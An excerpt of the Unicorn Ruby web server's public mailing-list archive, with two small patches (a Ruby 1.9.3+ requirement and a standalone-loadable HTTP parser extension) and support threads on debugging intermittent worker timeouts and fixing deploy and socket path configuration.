@@ -453,7 +453,7 @@ class Unicorn::HttpServer
 
       # exec(command, hash) works in at least 1.9.1+, but will only be
       # required in 1.9.4/2.0.0 at earliest.
-      cmd << listener_fds if RUBY_VERSION >= "1.9.1"
+      cmd << listener_fds
       logger.info "executing #{cmd.inspect} (in #{Dir.pwd})"
       before_exec.call(self)
       exec(*cmd)
diff --git a/local.mk.sample b/local.mk.sample
deleted file mode 100644
index 25bca5d..0000000
diff --git a/t/README b/t/README
index 095f106..bcaf3ce 100644
--- a/t/README
+++ b/t/README
@@ -10,7 +10,7 @@ comfortable writing integration tests with.
 
 == Requirements
 
-* {Ruby 1.8 or 1.9}[http://www.ruby-lang.org/] (duh!)
+* {Ruby 1.9.3+}[https://www.ruby-lang.org/] (duh!)
 * {GNU make}[http://www.gnu.org/software/make/]
 * {socat}[http://www.dest-unreach.org/socat/]
 * {curl}[http://curl.haxx.se/]
diff --git a/test/unit/test_socket_helper.rb b/test/unit/test_socket_helper.rb
index dd6881c..994b990 100644
--- a/test/unit/test_socket_helper.rb
+++ b/test/unit/test_socket_helper.rb
@@ -182,8 +182,8 @@ class TestSocketHelper < Test::Unit::TestCase
     sock = bind_listen "[#@test6_addr]:#{port}", :ipv6only => true
     cur = sock.getsockopt(:IPPROTO_IPV6, :IPV6_V6ONLY).unpack('i')[0]
     assert_equal 1, cur
-    rescue Errno::EAFNOSUPPORT
-  end if RUBY_VERSION >= "1.9.2"
+  rescue Errno::EAFNOSUPPORT
+  end
 
   def test_reuseport
     port = unused_port @test_addr
-- 
EW

^ permalink raw reply related	[relevance 3%]

* [PATCH] http: standalone require + reduction in binary size
@ 2015-02-04 20:16  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-04 20:16 UTC (permalink / raw)
  To: unicorn-public

This allows requiring just the C extension part of "unicorn_http",
without requiring the rest of unicorn, allowing other HTTP servers
using the same parser to be slimmer.

On my x86-64 Debian 7.0 system:

    text	   data	    bss	    dec	    hex	filename
   44026	   1976	    488	  46490	   b59a	lib/unicorn_http.so
   43930	   1976	    456	  46362	   b51a	lib/unicorn_http.so
---
 GNUmakefile                      | 5 ++++-
 ext/unicorn_http/httpdate.c      | 2 +-
 ext/unicorn_http/unicorn_http.rl | 2 +-
 3 files changed, 6 insertions(+), 3 deletions(-)

diff --git a/GNUmakefile b/GNUmakefile
index d7f0118..4c40dc9 100644
--- a/GNUmakefile
+++ b/GNUmakefile
@@ -85,10 +85,13 @@ test-unit: $(wildcard test/unit/test_*.rb)
 $(slow_tests): $(test_prefix)/.stamp
 	@$(MAKE) $(shell $(awk_slow) $@)
 
+test-require: $(ext)/unicorn_http.$(DLEXT)
+	$(RUBY) --disable-gems -I$(ext) -runicorn_http -e Unicorn
+
 test-integration: $(test_prefix)/.stamp
 	$(MAKE) -C t
 
-check: test test-integration
+check: test-require test test-integration
 test-all: check
 
 TEST_OPTS = -v
diff --git a/ext/unicorn_http/httpdate.c b/ext/unicorn_http/httpdate.c
index bf54fdd..0a1045f 100644
--- a/ext/unicorn_http/httpdate.c
+++ b/ext/unicorn_http/httpdate.c
@@ -66,7 +66,7 @@ static VALUE httpdate(VALUE self)
 
 void init_unicorn_httpdate(void)
 {
-	VALUE mod = rb_const_get(rb_cObject, rb_intern("Unicorn"));
+	VALUE mod = rb_define_module("Unicorn");
 	mod = rb_define_module_under(mod, "HttpResponse");
 
 	buf = rb_str_new(0, buf_capa - 1);
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index de83652..932d259 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -926,7 +926,7 @@ void Init_unicorn_http(void)
 {
   VALUE mUnicorn, cHttpParser;
 
-  mUnicorn = rb_const_get(rb_cObject, rb_intern("Unicorn"));
+  mUnicorn = rb_define_module("Unicorn");
   cHttpParser = rb_define_class_under(mUnicorn, "HttpParser", rb_cObject);
   eHttpParserError =
          rb_define_class_under(mUnicorn, "HttpParserError", rb_eIOError);
-- 
EW


^ permalink raw reply related	[relevance 2%]

* Re: Unicorn workers timing out intermittently
  2014-12-30 18:12  0% ` Eric Wong
@ 2014-12-30 20:02  0%   ` Aaron Price
  0 siblings, 0 replies; 200+ results
From: Aaron Price @ 2014-12-30 20:02 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Thank for your help, Eric.

I was able to pinpoint the issue, and I've posted the solution.

The issue was that I wasn't closing a database connection for code being
run in custom Rack middleware. Which is why the logs didn't show anything.

http://serverfault.com/questions/655430/unicorn-workers-timing-out-intermittently/655478#655478

Thanks again.


On Tue, Dec 30, 2014 at 1:12 PM, Eric Wong <e@80x24.org> wrote:

> Aaron Price <aprice@flipgive.com> wrote:
> > Hey guys,
> >
> > I'm having the following issue and I was hoping you might be able to shed
> > some light on the issue. Maybe give some suggestions on how to debug the
> > actual problem.
> >
> >
> http://serverfault.com/questions/655430/unicorn-workers-timing-out-intermittently
>
> (quoting the problem in full to save folks from having to load the page)
>
> >    I'm getting intermittent timeouts from unicorn workers for seemingly
> no
> >    reason, and I'd like some help to debug the actual problem. It's worse
> >    because it works about 10 - 20 requests then 1 will timeout, then
> >    another 10 - 20 requests and the same thing will happen again.
> >
> >    I've created a dev environment to illustrate this particular problem,
> >    so there is NO traffic except mine.
> >
> >    The stack is Ubuntu 14.04, Rails 3.2.21, PostgreSQL 9.3.4, Unicorn
> >    4.8.3, Nginx 1.6.2.
> >
> >    The Problem
> >
> >    I'll describe in detail the time that it doesn't work.
> >
> >    I request a url through the browser.
> > Started GET
> "/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T1
> > 8:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z"
> for 127.0
> > .0.1 at 2014-12-30 15:58:59 +0000
> > Completed 200 OK in 10.3ms (Views: 0.0ms | ActiveRecord: 2.1ms)
> >
> >    As you can see, the request completed successfully with a 200 response
> >    status in just 10.3ms.
> >
> >    However, the browser hangs for about 30 seconds and Unicorn kills the
> >    worker:
> > E, [2014-12-30T15:59:30.267605 #13678] ERROR -- : worker=0 PID:14594
> timeout (31
> > s > 30s), killing
> > E, [2014-12-30T15:59:30.279000 #13678] ERROR -- : reaped
> #<Process::Status: pid
> > 14594 SIGKILL (signal 9)> worker=0
> > I, [2014-12-30T15:59:30.355085 #23533]  INFO -- : worker=0 ready
> >
> >    And the following error in the Nginx logs:
> > 2014/12/30 15:59:30 [error] 23463#0: *27 upstream prematurely closed
> connection
> > while reading response header from upstream, client: 127.0.0.1, server:
> localhos
> > t, request: "GET
> /offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-
> >
> 28T18:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z
> HTTP/1
> > .1", upstream: "http://unix:
> /app/shared/tmp/sockets/unicorn.sock:/offers.xml?q%5
> >
> bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:01:16Z&q%5bupdated_at_less
> > _than_or_equal_to%5d=2014-12-28T19:30:21Z", host: "localhost", referrer:
> "http:/
> >
> /localhost/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:0
> > 1:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z"
>
> OK, the problem should be reproducible hitting unicorn directly (easy to
> configure a TCP listener) and eliminating nginx as a possible
> point-of-failure.  Also, I suggest using curl so you can script and see
> everything going on more easily at the protocol/syscall level.
>
> >    Again. There's no load on the server at all. The only requests going
> >    through are my own and every 10 - 20 requests at random have this same
> >    problem.
>
> OK, the main culprit is usually external connections acting up.  Postgres,
> external monitoring services, network failures, etc...
>
> >    It doesn't look like unicorn is eating memory at all. I know this
> >    because I'm using watch -n 0.5 free -m and this is the result.
>
> What does the CPU usage look like?
>
> >              total       used       free     shared    buffers     cached
> > Mem:          1995        765       1229          0         94        405
> > -/+ buffers/cache:        264       1730
> > Swap:          511          0        511
> >
> >    So the server isn't running out of memory.
> >
> >    Is there anything further I can do to debug this issue? or any insight
> >    into what's happening?
>
> Basically, minimize and isolate things.  Use a single worker, strace
> that worker ("strace -f -p $PID_OF_WORKER") and send a request to it
> using curl.
>
> Is the Postgres doing OK?  How is the network connection to that?
> What other external resources (monitoring services, memcached, redis,
> etc...) might you be hitting?  You'll see blocking (on things like
> read*/write*/select/poll/recvmsg/sendmsg) on strace.
>
> You can map numeric file descriptors to ports via:
>  lsof -p $PID_OF_WORKER
>
> Also, is your server running out of entropy?  (You'll see blocking on
> reading /dev/random via strace) and you may also see low values in
> /proc/sys/kernel/random/entropy_avail
>



-- 
*Aaron Price*
Sr. Web Developer
FlipGive
P: (416) 583-2510

312 Adelaide St. West, Suite 301
Toronto, ON, M5V 1R2
www.flipgive.com

Follow us on: Facebook <http://www.facebook.com/FlipGive> | Twitter
<http://twitter.com/FlipGive> | LinkedIn
<http://www.linkedin.com/company/FlipGive>


^ permalink raw reply	[relevance 0%]

* Re: Unicorn workers timing out intermittently
  @ 2014-12-30 18:12  0% ` Eric Wong
  2014-12-30 20:02  0%   ` Aaron Price
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-12-30 18:12 UTC (permalink / raw)
  To: Aaron Price; +Cc: unicorn-public

Aaron Price <aprice@flipgive.com> wrote:
> Hey guys,
> 
> I'm having the following issue and I was hoping you might be able to shed
> some light on the issue. Maybe give some suggestions on how to debug the
> actual problem.
> 
> http://serverfault.com/questions/655430/unicorn-workers-timing-out-intermittently

(quoting the problem in full to save folks from having to load the page)

>    I'm getting intermittent timeouts from unicorn workers for seemingly no
>    reason, and I'd like some help to debug the actual problem. It's worse
>    because it works about 10 - 20 requests then 1 will timeout, then
>    another 10 - 20 requests and the same thing will happen again.
> 
>    I've created a dev environment to illustrate this particular problem,
>    so there is NO traffic except mine.
> 
>    The stack is Ubuntu 14.04, Rails 3.2.21, PostgreSQL 9.3.4, Unicorn
>    4.8.3, Nginx 1.6.2.
> 
>    The Problem
> 
>    I'll describe in detail the time that it doesn't work.
> 
>    I request a url through the browser.
> Started GET "/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T1
> 8:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z" for 127.0
> .0.1 at 2014-12-30 15:58:59 +0000
> Completed 200 OK in 10.3ms (Views: 0.0ms | ActiveRecord: 2.1ms)
> 
>    As you can see, the request completed successfully with a 200 response
>    status in just 10.3ms.
> 
>    However, the browser hangs for about 30 seconds and Unicorn kills the
>    worker:
> E, [2014-12-30T15:59:30.267605 #13678] ERROR -- : worker=0 PID:14594 timeout (31
> s > 30s), killing
> E, [2014-12-30T15:59:30.279000 #13678] ERROR -- : reaped #<Process::Status: pid
> 14594 SIGKILL (signal 9)> worker=0
> I, [2014-12-30T15:59:30.355085 #23533]  INFO -- : worker=0 ready
> 
>    And the following error in the Nginx logs:
> 2014/12/30 15:59:30 [error] 23463#0: *27 upstream prematurely closed connection
> while reading response header from upstream, client: 127.0.0.1, server: localhos
> t, request: "GET /offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-
> 28T18:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z HTTP/1
> .1", upstream: "http://unix:/app/shared/tmp/sockets/unicorn.sock:/offers.xml?q%5
> bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:01:16Z&q%5bupdated_at_less
> _than_or_equal_to%5d=2014-12-28T19:30:21Z", host: "localhost", referrer: "http:/
> /localhost/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:0
> 1:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z"

OK, the problem should be reproducible hitting unicorn directly (easy to
configure a TCP listener) and eliminating nginx as a possible
point-of-failure.  Also, I suggest using curl so you can script and see
everything going on more easily at the protocol/syscall level.

>    Again. There's no load on the server at all. The only requests going
>    through are my own and every 10 - 20 requests at random have this same
>    problem.

OK, the main culprit is usually external connections acting up.  Postgres,
external monitoring services, network failures, etc...

>    It doesn't look like unicorn is eating memory at all. I know this
>    because I'm using watch -n 0.5 free -m and this is the result.

What does the CPU usage look like?

>              total       used       free     shared    buffers     cached
> Mem:          1995        765       1229          0         94        405
> -/+ buffers/cache:        264       1730
> Swap:          511          0        511
> 
>    So the server isn't running out of memory.
> 
>    Is there anything further I can do to debug this issue? or any insight
>    into what's happening?

Basically, minimize and isolate things.  Use a single worker, strace
that worker ("strace -f -p $PID_OF_WORKER") and send a request to it
using curl.

Is the Postgres doing OK?  How is the network connection to that?
What other external resources (monitoring services, memcached, redis,
etc...) might you be hitting?  You'll see blocking (on things like
read*/write*/select/poll/recvmsg/sendmsg) on strace.

You can map numeric file descriptors to ports via:
 lsof -p $PID_OF_WORKER

Also, is your server running out of entropy?  (You'll see blocking on
reading /dev/random via strace) and you may also see low values in
/proc/sys/kernel/random/entropy_avail

^ permalink raw reply	[relevance 0%]

* RE: Issue with Unicorn: Big latency when getting a request
  @ 2014-11-14 22:36  3%                     ` Roberto Cordoba del Moral
  0 siblings, 0 replies; 200+ results
From: Roberto Cordoba del Moral @ 2014-11-14 22:36 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public@bogomips.org

I have tested with 5 workers and still the same issue.
It´s strange, If this is happening to everyone, it should be a more known problem. I have search everywhere in Internet and I couldn´t find anything related to it.
My guess is that probably I have something in my Rails code related to sessions or cookies that is handled in a different way in the browsers but it´s also related to the application server.
I don´t know. But although I feel really curious with the isssue and I would love to find it out, I think I will try with Puma.
Thank you so much for your time.

> Date: Fri, 14 Nov 2014 18:34:34 +0000
> From: e@80x24.org
> To: roberto.chingon@hotmail.com
> CC: unicorn-public@bogomips.org
> Subject: Re: Issue with Unicorn: Big latency when getting a request
> 
> Roberto Cordoba del Moral <roberto.chingon@hotmail.com> wrote:
> > I have installed Puma and it´s working.
> > It´s the combination of Unicorn and Chrome which is not working. I
> > don´t know why.
> 
> Just curious, can you try configuring "worker_processes 4" in unicorn
> (or maybe increase 4 to 8 or any hihgher number if you have enough
> memory).  If extra workers works, it's definitely the lack of baked-in
> concurrency in unicorn (this is by design).
> 
> So I suspect puma (or any other server) is better for your use case
> anyways.
 		 	   		  

^ permalink raw reply	[relevance 3%]

* Re: Having issue with Unicorn
  2014-10-24 20:35  0%                           ` Imdad
@ 2014-10-24 20:39  0%                             ` Imdad
  0 siblings, 0 replies; 200+ results
From: Imdad @ 2014-10-24 20:39 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

The log file under "/var/www/hailisys/releases/shared" folder have the
following error logs

root@Hailisys:/var/www/hailisys/releases/shared# tail -n 20 -f
log/unicorn.stderr.log
I, [2014-10-24T16:28:27.289186 #12384]  INFO -- : listening on addr=
0.0.0.0:3000 fd=10
F, [2014-10-24T16:28:27.289460 #12384] FATAL -- : error adding listener
addr=/var/www/hailisys/releases/shared/sockets/unicorn.sock
/var/www/hailisys/releases/17/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/socket_helper.rb:158:in
`initialize': No such file or directory - connect(2) for
"/var/www/hailisys/releases/shared/sockets/unicorn.sock" (Errno::ENOENT)
from
/var/www/hailisys/releases/17/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/socket_helper.rb:158:in
`new'


Cheers!
Imdad Ali Khan
Mob (0) 9818484057
http://www.linkedin.com/in/imdad

On 25 October 2014 02:05, Imdad <khanimdad@gmail.com> wrote:

> Sorry Eric, but the site (http://104.131.74.69/) still not working
> Showing error "We're sorry, but something went wrong."
>
> Cheers!
> Imdad Ali Khan
> Mob (0) 9818484057
> http://www.linkedin.com/in/imdad
>
> On 25 October 2014 01:47, Eric Wong <e@80x24.org> wrote:
>
>> Imdad <khanimdad@gmail.com> wrote:
>> > Nope, still its not working, same error as below
>>
>> I'm not sure what you mean...  Can you access the site OK?
>>
>> > I, [2014-10-24T19:56:16.054817 #18256]  INFO -- : executing
>> > ["/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/bin/unicorn", "-c",
>> > "/var/www/hailisys/current/config/unicorn.rb", "-D", "-E", "production",
>> > {11=>#<Kgio::UNIXServer:fd 11>}] (in /var/www/hailisys/releases/31)
>> > I, [2014-10-24T19:56:16.626199 #18256]  INFO -- : inherited
>> > addr=/var/www/hailisys/shared/sockets/unicorn.sock fd=11
>> > I, [2014-10-24T19:56:16.626930 #18256]  INFO -- : Refreshing Gem list
>> > I, [2014-10-24T19:56:18.723512 #18256]  INFO -- : master process ready
>> > I, [2014-10-24T19:56:18.727108 #18261]  INFO -- : worker=0 ready
>> > I, [2014-10-24T19:56:18.742734 #18264]  INFO -- : worker=1 ready
>> > I, [2014-10-24T19:56:18.921508 #8814]  INFO -- : reaped
>> #<Process::Status:
>> > pid 18246 exit 0> worker=0
>> > I, [2014-10-24T19:56:18.921691 #8814]  INFO -- : reaped
>> #<Process::Status:
>> > pid 18249 exit 0> worker=1
>> > I, [2014-10-24T19:56:18.921776 #8814]  INFO -- : master complete
>>
>> Everything above looks OK.
>>
>
>


^ permalink raw reply	[relevance 0%]

* Re: Having issue with Unicorn
  2014-10-24 20:17  0%                         ` Eric Wong
@ 2014-10-24 20:35  0%                           ` Imdad
  2014-10-24 20:39  0%                             ` Imdad
  0 siblings, 1 reply; 200+ results
From: Imdad @ 2014-10-24 20:35 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Sorry Eric, but the site (http://104.131.74.69/) still not working
Showing error "We're sorry, but something went wrong."

Cheers!
Imdad Ali Khan
Mob (0) 9818484057
http://www.linkedin.com/in/imdad

On 25 October 2014 01:47, Eric Wong <e@80x24.org> wrote:

> Imdad <khanimdad@gmail.com> wrote:
> > Nope, still its not working, same error as below
>
> I'm not sure what you mean...  Can you access the site OK?
>
> > I, [2014-10-24T19:56:16.054817 #18256]  INFO -- : executing
> > ["/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/bin/unicorn", "-c",
> > "/var/www/hailisys/current/config/unicorn.rb", "-D", "-E", "production",
> > {11=>#<Kgio::UNIXServer:fd 11>}] (in /var/www/hailisys/releases/31)
> > I, [2014-10-24T19:56:16.626199 #18256]  INFO -- : inherited
> > addr=/var/www/hailisys/shared/sockets/unicorn.sock fd=11
> > I, [2014-10-24T19:56:16.626930 #18256]  INFO -- : Refreshing Gem list
> > I, [2014-10-24T19:56:18.723512 #18256]  INFO -- : master process ready
> > I, [2014-10-24T19:56:18.727108 #18261]  INFO -- : worker=0 ready
> > I, [2014-10-24T19:56:18.742734 #18264]  INFO -- : worker=1 ready
> > I, [2014-10-24T19:56:18.921508 #8814]  INFO -- : reaped
> #<Process::Status:
> > pid 18246 exit 0> worker=0
> > I, [2014-10-24T19:56:18.921691 #8814]  INFO -- : reaped
> #<Process::Status:
> > pid 18249 exit 0> worker=1
> > I, [2014-10-24T19:56:18.921776 #8814]  INFO -- : master complete
>
> Everything above looks OK.
>


^ permalink raw reply	[relevance 0%]

* Re: Having issue with Unicorn
  2014-10-24 20:09  3%                       ` Imdad
@ 2014-10-24 20:17  0%                         ` Eric Wong
  2014-10-24 20:35  0%                           ` Imdad
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-10-24 20:17 UTC (permalink / raw)
  To: Imdad; +Cc: unicorn-public

Imdad <khanimdad@gmail.com> wrote:
> Nope, still its not working, same error as below

I'm not sure what you mean...  Can you access the site OK?

> I, [2014-10-24T19:56:16.054817 #18256]  INFO -- : executing
> ["/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/bin/unicorn", "-c",
> "/var/www/hailisys/current/config/unicorn.rb", "-D", "-E", "production",
> {11=>#<Kgio::UNIXServer:fd 11>}] (in /var/www/hailisys/releases/31)
> I, [2014-10-24T19:56:16.626199 #18256]  INFO -- : inherited
> addr=/var/www/hailisys/shared/sockets/unicorn.sock fd=11
> I, [2014-10-24T19:56:16.626930 #18256]  INFO -- : Refreshing Gem list
> I, [2014-10-24T19:56:18.723512 #18256]  INFO -- : master process ready
> I, [2014-10-24T19:56:18.727108 #18261]  INFO -- : worker=0 ready
> I, [2014-10-24T19:56:18.742734 #18264]  INFO -- : worker=1 ready
> I, [2014-10-24T19:56:18.921508 #8814]  INFO -- : reaped #<Process::Status:
> pid 18246 exit 0> worker=0
> I, [2014-10-24T19:56:18.921691 #8814]  INFO -- : reaped #<Process::Status:
> pid 18249 exit 0> worker=1
> I, [2014-10-24T19:56:18.921776 #8814]  INFO -- : master complete

Everything above looks OK.

^ permalink raw reply	[relevance 0%]

* Re: Having issue with Unicorn
  @ 2014-10-24 20:09  3%                       ` Imdad
  2014-10-24 20:17  0%                         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Imdad @ 2014-10-24 20:09 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Nope, still its not working, same error as below

Cheers!
Imdad Ali Khan
Mob (0) 9818484057
http://www.linkedin.com/in/imdad

On 25 October 2014 01:36, Eric Wong <e@80x24.org> wrote:

> So it looks like everything at 19:56 was successful and all is good,
> right?
>


^ permalink raw reply	[relevance 3%]

* Re: Having issue with Unicorn
  2014-10-24 18:13  0%     ` Eric Wong
@ 2014-10-24 18:28  0%       ` Imdad
    0 siblings, 1 reply; 200+ results
From: Imdad @ 2014-10-24 18:28 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Updates app_dir and shared_dir as stated here then did a deploy which went
okay, but my app still not running and log spit the following...

root@Hailisys:/var/www/hailisys/shared/log# tail -n 20 -f
unicorn.stderr.log
I, [2014-10-24T17:28:53.162084 #15819]  INFO -- : executing
["/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn", "-c",
"/var/www/hailisys/current/config/unicorn.rb", "-D", "-E", "production",
{11=>#<Kgio::UNIXServer:fd 11>}] (in /var/www/hailisys/releases/28)
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:475:in
`exec': No such file or directory -
/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn
(Errno::ENOENT)
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:475:in
`block in reexec'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:447:in
`fork'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:447:in
`reexec'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:307:in
`join'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/bin/unicorn:126:in
`<top (required)>'
from
/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn:23:in
`load'
from
/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn:23:in
`<main>'
E, [2014-10-24T17:28:53.440532 #8814] ERROR -- : reaped #<Process::Status:
pid 15819 exit 1> exec()-ed
I, [2014-10-24T18:21:54.882454 #16594]  INFO -- : executing
["/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn", "-c",
"/var/www/hailisys/current/config/unicorn.rb", "-D", "-E", "production",
{11=>#<Kgio::UNIXServer:fd 11>}] (in /var/www/hailisys/releases/29)
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:475:in
`exec': No such file or directory -
/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn
(Errno::ENOENT)
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:475:in
`block in reexec'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:447:in
`fork'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:447:in
`reexec'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/lib/unicorn/http_server.rb:307:in
`join'
from
/var/www/hailisys/current/vendor/bundle/ruby/2.1.0/gems/unicorn-4.8.3/bin/unicorn:126:in
`<top (required)>'
from
/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn:23:in
`load'
from
/var/www/hailisys/releases/6/vendor/bundle/ruby/2.1.0/bin/unicorn:23:in
`<main>'
E, [2014-10-24T18:21:55.053890 #8814] ERROR -- : reaped #<Process::Status:
pid 16594 exit 1> exec()-ed


Cheers!
Imdad Ali Khan
Mob (0) 9818484057
http://www.linkedin.com/in/imdad

On 24 October 2014 23:43, Eric Wong <e@80x24.org> wrote:

> Imdad <khanimdad@gmail.com> wrote:
> > Thanks Eric, here is my deploy.rb and config/unicorn.rb
> > NOTE: /releases/6 and /releases/28 both have same error message
> >
> > config/unicorn.rb
> > ==============
> > # Set your full path to application.
> > app_dir = File.expand_path('../../', __FILE__)
> > shared_dir = File.expand_path('../../../shared/', __FILE__)
>
> Using __FILE__ with File.expand_path here gets you in trouble
> because it loses track of symlinks like "current"
>
> The following should be more explicit, I think:
>
>         app_dir = "/var/www/hailisys/current"
>         shared_dir = "/var/www/hailisys/shared"
>
> And the rest of the config/unicorn.rb should pick those up as-is.
>
> > set :deploy_to, '/var/www/hailisys'
>
> Maybe you can export :deploy_to from your deploy config to your
> unicorn invocation to DRY-up your config/unicorn.rb config.
>
> So perhaps, something like:
>
>         app_dir = "#{ENV['deploy_to']}/current"
>         shared_dir = "#{ENV['deploy_to']}/shared"
>


^ permalink raw reply	[relevance 0%]

* Re: Having issue with Unicorn
  2014-10-24 18:02  1%   ` Imdad
@ 2014-10-24 18:13  0%     ` Eric Wong
  2014-10-24 18:28  0%       ` Imdad
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-10-24 18:13 UTC (permalink / raw)
  To: Imdad; +Cc: unicorn-public

Imdad <khanimdad@gmail.com> wrote:
> Thanks Eric, here is my deploy.rb and config/unicorn.rb
> NOTE: /releases/6 and /releases/28 both have same error message
> 
> config/unicorn.rb
> ==============
> # Set your full path to application.
> app_dir = File.expand_path('../../', __FILE__)
> shared_dir = File.expand_path('../../../shared/', __FILE__)

Using __FILE__ with File.expand_path here gets you in trouble
because it loses track of symlinks like "current"

The following should be more explicit, I think:

	app_dir = "/var/www/hailisys/current"
	shared_dir = "/var/www/hailisys/shared"

And the rest of the config/unicorn.rb should pick those up as-is.

> set :deploy_to, '/var/www/hailisys'

Maybe you can export :deploy_to from your deploy config to your
unicorn invocation to DRY-up your config/unicorn.rb config.

So perhaps, something like:

	app_dir = "#{ENV['deploy_to']}/current"
	shared_dir = "#{ENV['deploy_to']}/shared"

^ permalink raw reply	[relevance 0%]

* Re: Having issue with Unicorn
  @ 2014-10-24 18:02  1%   ` Imdad
  2014-10-24 18:13  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Imdad @ 2014-10-24 18:02 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Thanks Eric, here is my deploy.rb and config/unicorn.rb
NOTE: /releases/6 and /releases/28 both have same error message

config/unicorn.rb
==============
# Set your full path to application.
app_dir = File.expand_path('../../', __FILE__)
shared_dir = File.expand_path('../../../shared/', __FILE__)

# Set unicorn options
worker_processes 2
preload_app true
timeout 30

# Fill path to your app
working_directory app_dir

# Set up socket location
listen "#{shared_dir}/sockets/unicorn.sock", :backlog => 64

# Loging
stderr_path "#{shared_dir}/log/unicorn.stderr.log"
stdout_path "#{shared_dir}/log/unicorn.stdout.log"

# Set master PID location
pid "#{shared_dir}/pids/unicorn.pid"

before_fork do |server, worker|
  defined?(ActiveRecord::Base) and ActiveRecord::Base.connection.disconnect!
  old_pid = "#{server.config[:pid]}.oldbin"
  if File.exists?(old_pid) && server.pid != old_pid
    begin
      sig = (worker.nr + 1) >= server.worker_processes ? :QUIT : :TTOU
      Process.kill(sig, File.read(old_pid).to_i)
    rescue Errno::ENOENT, Errno::ESRCH
      # someone else did our job for us
    end
  end
end

after_fork do |server, worker|
  defined?(ActiveRecord::Base) and ActiveRecord::Base.establish_connection
end

before_exec do |server|
  ENV['BUNDLE_GEMFILE'] = "#{app_dir}/Gemfile"
end

deploy.rb
==========
require 'mina/bundler'
require 'mina/rails'
require 'mina/git'
require 'mina/rbenv'  # for rbenv support. (http://rbenv.org)
# require 'mina/rvm'    # for rvm support. (http://rvm.io)
# TODO: Look into this later
#require 'mina_sidekiq/tasks'
require 'mina/unicorn'


# Basic settings:
#   domain       - The hostname to SSH to.
#   deploy_to    - Path to deploy into.
#   repository   - Git repo to clone from. (needed by mina/git)
#   branch       - Branch name to deploy. (needed by mina/git)
set_default :rbenv_path, "/root/.rbenv" #{}"/root/.rbenv"
#set_default :bundle_path, '/root/.rbenv/shims/bundle'
#set_default :bundle_bin, 'bundle exec'

set :domain, '104.131.74.69'

set :deploy_to, '/var/www/hailisys'

set :repository, 'https://gitlab.com/hailisys/hailisys.git'
set :branch, 'master'
set :user, 'root'
set :forward_agent, true
# MOIN: Fix Password issue
set :term_mode, nil
# MOIN: Could be staging, production
set :rails_env, 'production'
set :port, '22'
set :unicorn_pid, "#{deploy_to}/shared/pids/unicorn.pid"

# For system-wide RVM install.
#   set :rvm_path, '/usr/local/rvm/bin/rvm'

# Manually create these paths in shared/ (eg: shared/config/database.yml)
in your server.
# They will be linked in the 'deploy:link_shared_paths' step.
